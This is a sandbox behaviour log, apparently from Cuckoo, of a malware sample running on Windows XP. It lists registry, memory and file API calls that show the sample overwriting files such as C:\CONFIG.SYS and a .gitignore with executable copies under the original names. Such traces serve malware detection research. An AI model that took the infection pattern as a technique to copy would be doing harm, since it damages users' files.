"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->AppData","dwType->1","lpData->C:\Documents and Settings\janettedoe\Application Data","cbData->108"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->0x000001bc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->My Pictures"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000000b8","lpValueName->My Pictures","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents\My Pictures","cbData->124"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000000b8","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001bc","hKey->0x000000b8","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001bc","lpValueName->Generation"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->39287"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->39287"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->268"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000001c8","nNumberOfBytesToWrite->268"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\CONFIG.SYS"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\CONFIG.SYS.exe","lpNewFileName->C:\CONFIG.SYS"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->268"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001c0","lpFileName->C:\f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","dwDesiredAccess->GENERIC_READ"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000001cc","lpFileName->C:\cuckoo\additional\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","CreateFileW","SUCCESS","0x000000b8","lpFileName->C:\cuckoo\additional\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->CompareJunctionness"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001d4","lpValueName->ProgramFilesDir (x86)"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->432","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.567","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->61440"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001c0","nNumberOfBytesToRead->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->39287"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","ReadFile","SUCCESS","","hFile->0x000001cc","nNumberOfBytesToRead->71"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->71"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","WriteFile","SUCCESS","","hFile->0x000000b8","nNumberOfBytesToWrite->268"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\additional\.gitignore"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->ProgramFilesDir"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->0x000001cc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->Generation"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","FAILURE","","hKey->0x000001c0","lpValueName->CommonPictures"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","system","LoadLibraryA","SUCCESS","0x769c0000","lpFileName->USERENV.dll"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->ProfilesDirectory"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\ProfileList"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->AllUsersProfile"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegCreateKeyExW","SUCCESS","0x000001c0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegSetValueExW","SUCCESS","","hKey->0x000001c0","lpValueName->CommonPictures","dwType->1","lpData->C:\Documents and Settings\All Users\Documents\My Pictures","cbData->116"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001c0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExW","SUCCESS","0x000001cc","hKey->0x000001c0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001cc","lpValueName->Generation"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegOpenKeyExA","SUCCESS","0x000001ce","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\InProcServer32"
"20190731004116.577","148","f5cf59791f37a0e9d198ac61665898bbc36df2163162ea69397c0e2d399c6be2","1176","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001ce","lpValueName->(null)"
